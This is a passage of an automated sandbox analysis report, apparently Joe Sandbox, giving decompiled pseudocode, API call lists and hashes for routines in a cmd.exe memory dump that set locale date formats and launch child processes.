                                    								_t83 =  *(_t122 + _t95) & 0x0000ffff;
                                    								if(_t83 == 0) {
                                    									break;
                                    								}
                                    								 *_t95 = _t83;
                                    								_t95 =  &(_t95[1]);
                                    								_t109 = _t109 - 1;
                                    								if(_t109 != 0) {
                                    									continue;
                                    								}
                                    								L53:
                                    								_t95 = _t95 - 2;
                                    								L54:
                                    								 *_t95 = 0;
                                    								goto L17;
                                    							}
                                    							if(_t109 != 0) {
                                    								goto L54;
                                    							}
                                    							goto L53;
                                    						}
                                    						L17:
                                    						if(GetLocaleInfoW(_t136, 0x32, 0x11ff768, 0x20) == 0) {
                                    							_t96 = 0x11ff768;
                                    							_t110 = 0x20;
                                    							_t124 = L"Tue" - 0x11ff768;
                                    							while(1) {
                                    								_t17 = _t110 + 0x7fffffde; // 0x7ffffffe
                                    								if(_t17 == 0) {
                                    									break;
                                    								}
                                    								_t82 =  *(_t124 + _t96) & 0x0000ffff;
                                    								if(_t82 == 0) {
                                    									break;
                                    								}
                                    								 *_t96 = _t82;
                                    								_t96 =  &(_t96[1]);
                                    								_t110 = _t110 - 1;
                                    								if(_t110 != 0) {
                                    									continue;
                                    								}
                                    								L61:
                                    								_t96 = _t96 - 2;
                                    								L62:
                                    								 *_t96 = 0;
                                    								goto L18;
                                    							}
                                    							if(_t110 != 0) {
                                    								goto L62;
                                    							}
                                    							goto L61;
                                    						}
                                    						L18:
                                    						if(GetLocaleInfoW(_t136, 0x33, 0x11ff728, 0x20) == 0) {
                                    							_t97 = 0x11ff728;
                                    							_t111 = 0x20;
                                    							_t126 = L"Wed" - 0x11ff728;
                                    							while(1) {
                                    								_t19 = _t111 + 0x7fffffde; // 0x7ffffffe
                                    								if(_t19 == 0) {
                                    									break;
                                    								}
                                    								_t81 =  *(_t126 + _t97) & 0x0000ffff;
                                    								if(_t81 == 0) {
                                    									break;
                                    								}
                                    								 *_t97 = _t81;
                                    								_t97 =  &(_t97[1]);
                                    								_t111 = _t111 - 1;
                                    								if(_t111 != 0) {
                                    									continue;
                                    								}
                                    								L69:
                                    								_t97 = _t97 - 2;
                                    								L70:
                                    								 *_t97 = 0;
                                    								goto L19;
                                    							}
                                    							if(_t111 != 0) {
                                    								goto L70;
                                    							}
                                    							goto L69;
                                    						}
                                    						L19:
                                    						if(GetLocaleInfoW(_t136, 0x34, 0x11ff6e8, 0x20) == 0) {
                                    							_t98 = 0x11ff6e8;
                                    							_t112 = 0x20;
                                    							_t128 = L"Thu" - 0x11ff6e8;
                                    							while(1) {
                                    								_t21 = _t112 + 0x7fffffde; // 0x7ffffffe
                                    								if(_t21 == 0) {
                                    									break;
                                    								}
                                    								_t80 =  *(_t128 + _t98) & 0x0000ffff;
                                    								if(_t80 == 0) {
                                    									break;
                                    								}
                                    								 *_t98 = _t80;
                                    								_t98 =  &(_t98[1]);
                                    								_t112 = _t112 - 1;
                                    								if(_t112 != 0) {
                                    									continue;
                                    								}
                                    								L77:
                                    								_t98 = _t98 - 2;
                                    								L78:
                                    								 *_t98 = 0;
                                    								goto L20;
                                    							}
                                    							if(_t112 != 0) {
                                    								goto L78;
                                    							}
                                    							goto L77;
                                    						}
                                    						L20:
                                    						if(GetLocaleInfoW(_t136, 0x35, 0x11ff6a8, 0x20) == 0) {
                                    							_t99 = 0x11ff6a8;
                                    							_t113 = 0x20;
                                    							_t130 = L"Fri" - 0x11ff6a8;
                                    							while(1) {
                                    								_t23 = _t113 + 0x7fffffde; // 0x7ffffffe
                                    								if(_t23 == 0) {
                                    									break;
                                    								}
                                    								_t79 =  *(_t130 + _t99) & 0x0000ffff;
                                    								if(_t79 == 0) {
                                    									break;
                                    								}
                                    								 *_t99 = _t79;
                                    								_t99 =  &(_t99[1]);
                                    								_t113 = _t113 - 1;
                                    								if(_t113 != 0) {
                                    									continue;
                                    								}
                                    								L85:
                                    								_t99 = _t99 - 2;
                                    								L86:
                                    								 *_t99 = 0;
                                    								goto L21;
                                    							}
                                    							if(_t113 != 0) {
                                    								goto L86;
                                    							}
                                    							goto L85;
                                    						}
                                    						L21:
                                    						if(GetLocaleInfoW(_t136, 0x36, 0x11ff668, 0x20) == 0) {
                                    							_t100 = 0x11ff668;
                                    							_t114 = 0x20;
                                    							_t132 = L"Sat" - 0x11ff668;
                                    							while(1) {
                                    								_t25 = _t114 + 0x7fffffde; // 0x7ffffffe
                                    								if(_t25 == 0) {
                                    									break;
                                    								}
                                    								_t78 =  *(_t132 + _t100) & 0x0000ffff;
                                    								if(_t78 == 0) {
                                    									break;
                                    								}
                                    								 *_t100 = _t78;
                                    								_t100 =  &(_t100[1]);
                                    								_t114 = _t114 - 1;
                                    								if(_t114 != 0) {
                                    									continue;
                                    								}
                                    								L93:
                                    								_t100 = _t100 - 2;
                                    								L94:
                                    								 *_t100 = 0;
                                    								goto L22;
                                    							}
                                    							if(_t114 != 0) {
                                    								goto L94;
                                    							}
                                    							goto L93;
                                    						}
                                    						L22:
                                    						if(GetLocaleInfoW(_t136, 0x37, 0x11ff628, 0x20) == 0) {
                                    							_t101 = 0x11ff628;
                                    							_t115 = 0x20;
                                    							_t134 = L"Sun" - 0x11ff628;
                                    							while(1) {
                                    								_t27 = _t115 + 0x7fffffde; // 0x7ffffffe
                                    								if(_t27 == 0) {
                                    									break;
                                    								}
                                    								_t77 =  *(_t134 + _t101) & 0x0000ffff;
                                    								if(_t77 == 0) {
                                    									break;
                                    								}
                                    								 *_t101 = _t77;
                                    								_t101 =  &(_t101[1]);
                                    								_t115 = _t115 - 1;
                                    								if(_t115 != 0) {
                                    									continue;
                                    								}
                                    								L101:
                                    								_t101 = _t101 - 2;
                                    								L102:
                                    								 *_t101 = 0;
                                    								goto L23;
                                    							}
                                    							if(_t115 != 0) {
                                    								goto L102;
                                    							}
                                    							goto L101;
                                    						}
                                    						L23:
                                    						if(GetLocaleInfoW(_t136, 0xe, 0x11ff7fc, 8) == 0) {
                                    							_t102 = 0x11ff7fc;
                                    							_t116 = 8;
                                    							_t134 = "." - 0x11ff7fc;
                                    							while(1) {
                                    								_t29 = _t116 + 0x7ffffff6; // 0x7ffffffe
                                    								if(_t29 == 0) {
                                    									break;
                                    								}
                                    								_t76 =  *(_t134 + _t102) & 0x0000ffff;
                                    								if(_t76 == 0) {
                                    									break;
                                    								}
                                    								 *_t102 = _t76;
                                    								_t102 =  &(_t102[1]);
                                    								_t116 = _t116 - 1;
                                    								if(_t116 != 0) {
                                    									continue;
                                    								}
                                    								L109:
                                    								_t102 = _t102 - 2;
                                    								L110:
                                    								 *_t102 = 0;
                                    								goto L24;
                                    							}
                                    							if(_t116 != 0) {
                                    								goto L110;
                                    							}
                                    							goto L109;
                                    						}
                                    						L24:
                                    						if(GetLocaleInfoW(_t136, 0xf, 0x11ff7e8, 8) == 0) {
                                    							_t103 = 0x11ff7e8;
                                    							_t116 = 8;
                                    							_t136 = "," - 0x11ff7e8;
                                    							while(1) {
                                    								_t31 = _t116 + 0x7ffffff6; // 0x7ffffffe
                                    								if(_t31 == 0) {
                                    									break;
                                    								}
                                    								_t75 =  *(_t103 + _t136) & 0x0000ffff;
                                    								if(_t75 == 0) {
                                    									break;
                                    								}
                                    								 *_t103 = _t75;
                                    								_t103 =  &(_t103[1]);
                                    								_t116 = _t116 - 1;
                                    								if(_t116 != 0) {
                                    									continue;
                                    								}
                                    								L117:
                                    								_t103 = _t103 - 2;
                                    								L118:
                                    								 *_t103 = 0;
                                    								goto L25;
                                    							}
                                    							if(_t116 != 0) {
                                    								goto L118;
                                    							}
                                    							goto L117;
                                    						}
                                    						L25:
                                    						__imp__setlocale(".OCP");
                                    						return E011E6FD0(0, _t92, _v8 ^ _t138, _t116, _t134, _t136, 0);
                                    					}
                                    				} else {
                                    					_t89 = "1";
                                    					_t106 =  &_v264;
                                    					while(1) {
                                    						_t116 =  *_t106;
                                    						if(_t116 !=  *_t89) {
                                    							break;
                                    						}
                                    						if(_t116 == 0) {
                                    							L7:
                                    							_t90 = 0;
                                    							L8:
                                    							 *0x11fd0cc = _t90;
                                    							goto L9;
                                    						}
                                    						_t116 =  *((intOrPtr*)(_t106 + 2));
                                    						_t5 = _t89 + 2; // 0x410000
                                    						if(_t116 !=  *_t5) {
                                    							break;
                                    						}
                                    						_t106 = _t106 + 4;
                                    						_t89 = _t89 + 4;
                                    						if(_t116 != 0) {
                                    							continue;
                                    						}
                                    						goto L7;
                                    					}
                                    					asm("sbb eax, eax");
                                    					_t90 = _t89 | 0x00000001;
                                    					goto L8;
                                    				}
                                    			}

























































                                    0x011ee45b
                                    0x011ee463
                                    0x00000000
                                    0x00000000
                                    0x011ee465
                                    0x011ee46c
                                    0x00000000
                                    0x00000000
                                    0x011ee46e
                                    0x011ee471
                                    0x011ee474
                                    0x011ee477
                                    0x00000000
                                    0x00000000
                                    0x011ee47f
                                    0x011ee47f
                                    0x011ee482
                                    0x011ee484
                                    0x00000000
                                    0x011ee484
                                    0x011ee47d
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011ee47d
                                    0x011e414a
                                    0x011e415c
                                    0x011ee48c
                                    0x011ee496
                                    0x011ee49b
                                    0x011ee49d
                                    0x011ee49d
                                    0x011ee4a5
                                    0x00000000
                                    0x00000000
                                    0x011ee4a7
                                    0x011ee4ae
                                    0x00000000
                                    0x00000000
                                    0x011ee4b0
                                    0x011ee4b3
                                    0x011ee4b6
                                    0x011ee4b9
                                    0x00000000
                                    0x00000000
                                    0x011ee4c1
                                    0x011ee4c1
                                    0x011ee4c4
                                    0x011ee4c6
                                    0x00000000
                                    0x011ee4c6
                                    0x011ee4bf
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011ee4bf
                                    0x011e4162
                                    0x011e4174
                                    0x011ee4ce
                                    0x011ee4d8
                                    0x011ee4dd
                                    0x011ee4df
                                    0x011ee4df
                                    0x011ee4e7
                                    0x00000000
                                    0x00000000
                                    0x011ee4e9
                                    0x011ee4f0
                                    0x00000000
                                    0x00000000
                                    0x011ee4f2
                                    0x011ee4f5
                                    0x011ee4f8
                                    0x011ee4fb
                                    0x00000000
                                    0x00000000
                                    0x011ee503
                                    0x011ee503
                                    0x011ee506
                                    0x011ee508
                                    0x00000000
                                    0x011ee508
                                    0x011ee501
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011ee501
                                    0x011e417a
                                    0x011e4181
                                    0x011e4199
                                    0x011e4199
                                    0x011e3fcf
                                    0x011e3fcf
                                    0x011e3fd4
                                    0x011e3fe0
                                    0x011e3fe0
                                    0x011e3fe6
                                    0x00000000
                                    0x00000000
                                    0x011e3fef
                                    0x011e400a
                                    0x011e400a
                                    0x011e400c
                                    0x011e400c
                                    0x00000000
                                    0x011e400c
                                    0x011e3ff1
                                    0x011e3ff5
                                    0x011e3ff9
                                    0x00000000
                                    0x00000000
                                    0x011e3fff
                                    0x011e4002
                                    0x011e4008
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011e4008
                                    0x011e419a
                                    0x011e419c
                                    0x00000000
                                    0x011e419c

                                    APIs
                                      • Part of subcall function 011E41A4: GetUserDefaultLCID.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(011D5BA1,0000001F,?,00000080), ref: 011E41A4
                                    • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0000001E,011FF81C,00000008,00000000,?), ref: 011E3FA8
                                    • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000023,?,00000080), ref: 011E3FC5
                                    • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000021,?,00000080), ref: 011E402A
                                    • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000024,?,00000080), ref: 011E406C
                                    • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0000001D,011FF80C,00000008), ref: 011E4094
                                    • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000031,011FF7A8,00000020), ref: 011E40AC
                                    • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000032,011FF768,00000020), ref: 011E40C4
                                    • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000033,011FF728,00000020), ref: 011E40DC
                                    • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000034,011FF6E8,00000020), ref: 011E40F4
                                    • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000035,011FF6A8,00000020), ref: 011E410C
                                    • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000036,011FF668,00000020), ref: 011E4124
                                    • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000037,011FF628,00000020), ref: 011E413C
                                    • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0000000E,011FF7FC,00000008), ref: 011E4154
                                    • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0000000F,011FF7E8,00000008), ref: 011E416C
                                    • setlocale.MSVCRT ref: 011E4181
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: InfoLocale$DefaultUsersetlocale
                                    • String ID: .OCP$1$Fri$MM/dd/yy$Mon$Sat$Sun$Thu$Tue$Wed$dd/MM/yy$yy/MM/dd
                                    • API String ID: 1351325837-478706884
                                    • Opcode ID: af09c8423edd66751bac084db4a9282ea27db8f0ec520b16768e2fe59d3c0293
                                    • Instruction ID: 01d5c50c34bf41494f6a64a8ceedfd0b5577f7e0b08e51f19e1b576177d46185
                                    • Opcode Fuzzy Hash: af09c8423edd66751bac084db4a9282ea27db8f0ec520b16768e2fe59d3c0293
                                    • Instruction Fuzzy Hash: 39D12675702A029AEB3D8EB8890C7763AE5FF51644F14822DE612DA5C8EBB0C646C356
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 85%
                                    			E011E374E(void* __ebx, intOrPtr __ecx, WCHAR* __edx, void* __edi, void* __esi, void* __eflags) {
                                    				void* _t68;
                                    				void* _t74;
                                    				intOrPtr _t84;
                                    				intOrPtr _t90;
                                    				WCHAR* _t92;
                                    				WCHAR* _t94;
                                    				WCHAR* _t95;
                                    				int _t98;
                                    				long _t99;
                                    				signed int _t101;
                                    				void* _t104;
                                    				struct _SECURITY_ATTRIBUTES* _t109;
                                    				void* _t117;
                                    				WCHAR* _t122;
                                    				WCHAR* _t129;
                                    				WCHAR* _t135;
                                    				void* _t147;
                                    				signed int _t154;
                                    				WCHAR* _t163;
                                    				void* _t165;
                                    				signed int _t167;
                                    				void* _t169;
                                    				WCHAR* _t174;
                                    				struct _SECURITY_ATTRIBUTES* _t177;
                                    				void* _t178;
                                    
                                    				E011E75CC(__ebx, __edi, __esi);
                                    				 *(_t178 - 0xa8) = __edx;
                                    				 *((intOrPtr*)(_t178 - 0xbc)) = __ecx;
                                    				_t174 =  *(_t178 + 0xc);
                                    				_t135 =  *(_t178 + 0x10);
                                    				_t177 = 0;
                                    				 *(_t178 - 0xac) = 0;
                                    				 *(_t178 - 0xa4) = 0;
                                    				 *((intOrPtr*)(_t178 - 0xb0)) = 0;
                                    				 *((intOrPtr*)(_t178 - 0xb4)) = 0x20;
                                    				_t68 = _t178 - 0xa0;
                                    				__imp__InitializeProcThreadAttributeList(_t68, 1, 0, _t178 - 0xb4, 0x11fbdf8, 0x108);
                                    				if(_t68 == 0) {
                                    					 *0x1213cf0 = GetLastError();
                                    					E011F5011(_t135);
                                    					L21:
                                    					return E011E7614(_t135, _t174, _t177);
                                    				}
                                    				 *((intOrPtr*)(_t178 - 0xb8)) = 1;
                                    				_t74 = _t178 - 0xa0;
                                    				__imp__UpdateProcThreadAttribute(_t74, 0, 0x60001, _t178 - 0xb8, 4, 0, 0);
                                    				if(_t74 == 0) {
                                    					 *0x1213cf0 = GetLastError();
                                    					E011F5011(_t135);
                                    					__imp__DeleteProcThreadAttributeList(_t178 - 0xa0);
                                    					goto L36;
                                    				} else {
                                    					memset(_t178 - 0x118, 0, 0x48);
                                    					 *((intOrPtr*)(_t178 - 0xd4)) = _t178 - 0xa0;
                                    					 *(_t178 - 0x118) = 0x48;
                                    					 *((intOrPtr*)(_t178 - 0x10c)) =  *((intOrPtr*)(_t178 + 0x14));
                                    					 *((intOrPtr*)(_t178 - 0x108)) = 0;
                                    					 *((intOrPtr*)(_t178 - 0x104)) = 1;
                                    					_t84 = 0x64;
                                    					 *((intOrPtr*)(_t178 - 0x100)) = _t84;
                                    					 *((intOrPtr*)(_t178 - 0xfc)) = _t84;
                                    					 *((intOrPtr*)(_t178 - 0xec)) = 0;
                                    					 *(_t178 - 0xe8) = 1;
                                    					memset(_t178 - 0x68, 0, 0x44);
                                    					 *(_t178 - 0x68) = 0x44;
                                    					GetStartupInfoW(_t178 - 0x68);
                                    					 *((intOrPtr*)(_t178 - 0x110)) =  *((intOrPtr*)(_t178 - 0x60));
                                    					 *((intOrPtr*)(_t178 - 4)) = 0;
                                    					if(E011E3320(L"COPYCMD") == 0) {
                                    					}
                                    					_t90 = E011DDF40(0x11d24ac);
                                    					 *((intOrPtr*)(_t178 - 0xb0)) = _t90;
                                    					if(_t90 == 0) {
                                    						L35:
                                    						_push(0xfffffffe);
                                    						_push(_t178 - 0x10);
                                    						_push(0x11fd0b4);
                                    						L011E82BB();
                                    						L36:
                                    						goto L21;
                                    					}
                                    					if( *0x1213ccc == 0) {
                                    						__eflags =  *0x1218058;
                                    						if( *0x1218058 != 0) {
                                    							goto L6;
                                    						}
                                    						__eflags =  *0x1213cc4;
                                    						if( *0x1213cc4 == 0) {
                                    							L8:
                                    							E011E4C00();
                                    							_t94 =  *0x1213cc4;
                                    							if(_t94 != 0) {
                                    								_t147 = _t94[0x18];
                                    								__eflags = _t147;
                                    								if(_t147 == 0) {
                                    									goto L9;
                                    								}
                                    								_t129 =  *0x1213cb8;
                                    								__eflags = _t129;
                                    								if(_t129 == 0) {
                                    									_t129 = 0x1213ab0;
                                    								}
                                    								_t98 = CreateProcessAsUserW(_t147, _t135, _t174, _t177, _t177, 1, 0x80000, _t177, _t129, _t178 - 0x118, _t178 - 0xcc);
                                    								L11:
                                    								_t174 = _t98;
                                    								if(_t174 == 0) {
                                    									_t99 = GetLastError();
                                    									 *(_t178 - 0xac) = _t99;
                                    									 *0x1213cf0 = _t99;
                                    								} else {
                                    									 *(_t178 - 0xa4) =  *(_t178 - 0xcc);
                                    									CloseHandle( *(_t178 - 0xc8));
                                    								}
                                    								_t150 = L"COPYCMD";
                                    								E011E3A50(L"COPYCMD",  *((intOrPtr*)(_t178 - 0xb0)));
                                    								if(_t174 == 0) {
                                    									__eflags =  *0x1213cc9;
                                    									if( *0x1213cc9 == 0) {
                                    										L48:
                                    										__eflags =  *0x1213cf0 - 0x2e4;
                                    										if( *0x1213cf0 != 0x2e4) {
                                    											L54:
                                    											__eflags = _t174;
                                    											if(_t174 != 0) {
                                    												goto L14;
                                    											}
                                    											_t177 = E011E00B0(0xffce);
                                    											__eflags = _t177;
                                    											if(_t177 != 0) {
                                    												E011E1040(_t177, 0x7fe7, _t135);
                                    												E011F5011(_t177);
                                    												E011E0040(_t177);
                                    											}
                                    											goto L35;
                                    										}
                                    										L49:
                                    										_t122 = E011E7797(_t150);
                                    										__eflags = _t122;
                                    										if(_t122 == 0) {
                                    											_t174 = _t177;
                                    										} else {
                                    											_t163 =  *0x1213cb8;
                                    											__eflags = _t163;
                                    											if(_t163 == 0) {
                                    												_t163 = 0x1213ab0;
                                    											}
                                    											_t174 =  *0x121c01c(_t177, _t135,  *((intOrPtr*)( *((intOrPtr*)(_t178 - 0xbc)) + 0x3c)), _t163,  *(_t178 - 0xe8) & 0x0000ffff, _t178 - 0xa4, 0x1213cf0);
                                    										}
                                    										goto L54;
                                    									}
                                    									__eflags =  *0x1213cf0 - 0xc1;
                                    									if( *0x1213cf0 == 0xc1) {
                                    										goto L49;
                                    									}
                                    									goto L48;
                                    								} else {
                                    									L14:
                                    									_t101 =  *(_t178 - 0xa4);
                                    									_t174 = _t101 & 1;
                                    									_t167 = 2;
                                    									_t154 = _t101 & _t167;
                                    									if(_t101 == 0) {
                                    										L62:
                                    										_t135 = 4;
                                    										L16:
                                    										 *(_t178 - 0xac) = _t177;
                                    										 *0x1203838 = 1;
                                    										if(_t135 != 0) {
                                    											L26:
                                    											__eflags = _t135 - 4;
                                    											if(_t135 == 4) {
                                    												_t104 =  *(_t178 - 0xa4);
                                    												__eflags = _t104;
                                    												if(_t104 != 0) {
                                    													CloseHandle(_t104);
                                    													 *(_t178 - 0xa4) = _t177;
                                    												}
                                    											} else {
                                    												__eflags = _t135 - _t167;
                                    												if(_t135 == _t167) {
                                    													 *0x11fd54c =  *(_t178 - 0xa4);
                                    												}
                                    											}
                                    											L20:
                                    											 *((intOrPtr*)(_t178 - 4)) = 0xfffffffe;
                                    											E011E3A30();
                                    											goto L21;
                                    										}
                                    										_t109 = E011E4C3E();
                                    										 *0x120b8b0 = _t109;
                                    										 *(_t178 - 0xa4) = _t177;
                                    										_t177 = _t109;
                                    										 *(_t178 - 0xac) = _t177;
                                    										E011E274C(_t178 - 0x4c, 0x14, L"%08X", _t177);
                                    										E011E3A50(L"=ExitCode", _t178 - 0x4c);
                                    										if(_t177 >= 0x20) {
                                    											__eflags = _t177 - 0x7e;
                                    											if(_t177 > 0x7e) {
                                    												goto L18;
                                    											}
                                    											E011E274C(_t178 - 0x80, 0xc, L"%01C", _t177);
                                    											_t169 = _t178 - 0x80;
                                    											L19:
                                    											E011E3A50(L"=ExitCodeAscii", _t169);
                                    											if(_t174 != 0) {
                                    												E011F579A(L"=ExitCodeAscii", __eflags);
                                    											}
                                    											goto L20;
                                    										}
                                    										L18:
                                    										_t169 = 0x11d24f0;
                                    										goto L19;
                                    									}
                                    									_t135 =  *(_t178 - 0xa8);
                                    									if( *0x1213ccc == 0) {
                                    										__eflags =  *0x1213cc4;
                                    										if( *0x1213cc4 != 0) {
                                    											goto L16;
                                    										}
                                    										__eflags =  *0x1213cc9;
                                    										if( *0x1213cc9 == 0) {
                                    											goto L16;
                                    										} else {
                                    											__eflags =  *0x1218058;
                                    											if( *0x1218058 != 0) {
                                    												goto L16;
                                    											}
                                    											__eflags = _t135;
                                    											if(_t135 != 0) {
                                    												goto L16;
                                    											}
                                    											__eflags = _t154;
                                    											if(_t154 != 0) {
                                    												goto L62;
                                    											}
                                    											_t117 = E011F52E3(_t101, _t167);
                                    											_t167 = 2;
                                    											__eflags = _t167 - _t117;
                                    											if(_t167 != _t117) {
                                    												goto L16;
                                    											}
                                    											goto L62;
                                    										}
                                    										goto L26;
                                    									}
                                    									goto L16;
                                    								}
                                    							}
                                    							L9:
                                    							_t95 =  *0x1213cb8;
                                    							if(_t95 == 0) {
                                    								_t95 = 0x1213ab0;
                                    							}
                                    							_t98 = CreateProcessW(_t135, _t174, _t177, _t177, 1, 0x80000, _t177, _t95, _t178 - 0x118, _t178 - 0xcc);
                                    							goto L11;
                                    						}
                                    					}
                                    					L6:
                                    					_t165 = 0x5c;
                                    					_t92 = E011E2349(_t135, _t165);
                                    					if(_t92 != 0 && lstrcmpW(_t92, L"\\XCOPY.EXE") == 0) {
                                    						E011F4478();
                                    					}
                                    					goto L8;
                                    				}
                                    			}




























                                    0x011edf3c
                                    0x011edf03
                                    0x011edf03
                                    0x011edf09
                                    0x011edf0b
                                    0x011edf0d
                                    0x011edf0d
                                    0x011edf38
                                    0x011edf38
                                    0x00000000
                                    0x011edf01
                                    0x011edee2
                                    0x011edeec
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011e3938
                                    0x011e3938
                                    0x011e3938
                                    0x011e3943
                                    0x011e3949
                                    0x011e394a
                                    0x011e394e
                                    0x011edf98
                                    0x011edf9a
                                    0x011e3967
                                    0x011e3967
                                    0x011e3970
                                    0x011e3977
                                    0x011e3a0c
                                    0x011e3a0c
                                    0x011e3a0f
                                    0x011edfbc
                                    0x011edfc2
                                    0x011edfc4
                                    0x011edfcb
                                    0x011edfd1
                                    0x011edfd1
                                    0x011e3a15
                                    0x011e3a15
                                    0x011e3a17
                                    0x011e3a1f
                                    0x011e3a1f
                                    0x011e3a17
                                    0x011e39d4
                                    0x011e39d4
                                    0x011e39db
                                    0x00000000
                                    0x011e39e0
                                    0x011e3983
                                    0x011e3988
                                    0x011e398d
                                    0x011e3993
                                    0x011e3995
                                    0x011e39a7
                                    0x011e39b7
                                    0x011e39bf
                                    0x011e3a26
                                    0x011e3a29
                                    0x00000000
                                    0x00000000
                                    0x011edfac
                                    0x011edfb4
                                    0x011e39c6
                                    0x011e39cb
                                    0x011e39d2
                                    0x011e3a49
                                    0x011e3a49
                                    0x00000000
                                    0x011e39d2
                                    0x011e39c1
                                    0x011e39c1
                                    0x00000000
                                    0x011e39c1
                                    0x011e3954
                                    0x011e3961
                                    0x011e39fa
                                    0x011e3a01
                                    0x00000000
                                    0x00000000
                                    0x011edf5f
                                    0x011edf66
                                    0x00000000
                                    0x011edf6c
                                    0x011edf6c
                                    0x011edf73
                                    0x00000000
                                    0x00000000
                                    0x011edf79
                                    0x011edf7b
                                    0x00000000
                                    0x00000000
                                    0x011edf81
                                    0x011edf83
                                    0x00000000
                                    0x00000000
                                    0x011edf87
                                    0x011edf8e
                                    0x011edf8f
                                    0x011edf92
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011edf92
                                    0x00000000
                                    0x011edf66
                                    0x00000000
                                    0x011e3961
                                    0x011e3932
                                    0x011e38ce
                                    0x011e38ce
                                    0x011e38d5
                                    0x011edeb9
                                    0x011edeb9
                                    0x011e38f8
                                    0x00000000
                                    0x011e38f8
                                    0x011ede73
                                    0x011e389a
                                    0x011e389c
                                    0x011e389f
                                    0x011e38a6
                                    0x011ede78
                                    0x011ede78
                                    0x00000000
                                    0x011e38a6

                                    APIs
                                    • InitializeProcThreadAttributeList.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,00000001,00000000,00000020,011FBDF8,00000108,011DC897,?,00000000,00000000,00000000), ref: 011E37A0
                                    • UpdateProcThreadAttribute.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,00000000,00060001,?,00000004,00000000,00000000,?,00000000,00000000,00000000), ref: 011E37CF
                                    • memset.MSVCRT ref: 011E37E7
                                    • memset.MSVCRT ref: 011E3840
                                    • GetStartupInfoW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000044), ref: 011E3853
                                      • Part of subcall function 011E3320: _wcsnicmp.MSVCRT ref: 011E33A4
                                    • lstrcmpW.API-MS-WIN-CORE-STRING-OBSOLETE-L1-1-0(00000000,\XCOPY.EXE), ref: 011E38AE
                                    • CreateProcessW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,?,00000000,00000000,00000001,00080000,00000000,?,?,?), ref: 011E38F8
                                    • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?), ref: 011E391A
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00000000,00000000,00000000), ref: 011EDDE6
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00000000,00000000,00000000), ref: 011EDE02
                                    • DeleteProcThreadAttributeList.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,?,00000000,00000000,00000000), ref: 011EDE1B
                                    • CreateProcessAsUserW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,?,?,00000000,00000000,00000001,00080000,00000000,?,?,?), ref: 011EDEAE
                                    • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?), ref: 011EDFCB
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: AttributeProcThread$CloseCreateErrorHandleLastListProcessmemset$DeleteInfoInitializeStartupUpdateUser_wcsnicmplstrcmp
                                    • String ID: $%01C$%08X$=ExitCode$=ExitCodeAscii$COPYCMD$D$H$\XCOPY.EXE
                                    • API String ID: 1603632292-3461277227
                                    • Opcode ID: d0212f88b018fa2c7bbe61fd571eaffbaab7243a03d1f4fe3e08752a976e5537
                                    • Instruction ID: 7396ef928c09472166a9c33fab79b4b2353d4f7010d55a68d293c9705eedfb2b
                                    • Opcode Fuzzy Hash: d0212f88b018fa2c7bbe61fd571eaffbaab7243a03d1f4fe3e08752a976e5537
                                    • Instruction Fuzzy Hash: E9C19570A106159EDF3CDBE9AC4CBAA7AF9BB55704F004099E619D7244EB708984CF52
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 75%
